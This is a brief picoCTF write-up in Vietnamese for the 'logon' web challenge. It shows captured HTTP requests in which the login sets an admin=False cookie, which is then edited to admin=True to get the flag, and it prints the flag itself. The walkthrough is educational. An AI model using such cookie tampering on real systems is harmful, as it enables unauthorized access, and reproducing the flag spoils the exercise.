Quartz 🪬

picoCTF - logon

2 min read

Description

picoCTF - logon

The factory is hiding things from all of its users. Can you login as Joe and find what they’ve been looking at? https://jupiter.challenges.picoctf.org/problem/44573/ (link) or http://jupiter.challenges.picoctf.org:44573

Hint: Hmm it doesn’t seem to check anyone’s password, except for Joe’s?

Approach

Request đăng nhập có dạng như sau:

POST /login HTTP/1.1
Host: jupiter.challenges.picoctf.org:44573
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://jupiter.challenges.picoctf.org:44573
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://jupiter.challenges.picoctf.org:44573/
Accept-Encoding: gzip, deflate, br
Accept-Language: vi,en-US;q=0.9,en;q=0.8
DNT: 1
Connection: close
 
user=admin&password=admin

Response thực hiện set 3 cookie:

HTTP/1.1 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 217
Location: http://jupiter.challenges.picoctf.org:44573/flag
Set-Cookie: password=admin; Path=/
Set-Cookie: username=admin; Path=/
Set-Cookie: admin=False; Path=/
 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/flag">/flag</a>.  If not click the link.

GET request đến endpoint /flag không có flag. Thử thay cookie admin=False thành admin=True và gửi lại request:

GET /flag HTTP/1.1
Host: jupiter.challenges.picoctf.org:44573
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://jupiter.challenges.picoctf.org:44573
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://jupiter.challenges.picoctf.org:44573/login
Accept-Encoding: gzip, deflate, br
Accept-Language: vi,en-US;q=0.9,en;q=0.8
Cookie: password=admin; username=admin; admin=True
DNT: 1
Connection: close

Thu được cờ ở trong response.

Flag

Success

picoCTF{th3_c0nsp1r4cy_l1v3s_0c98aacc}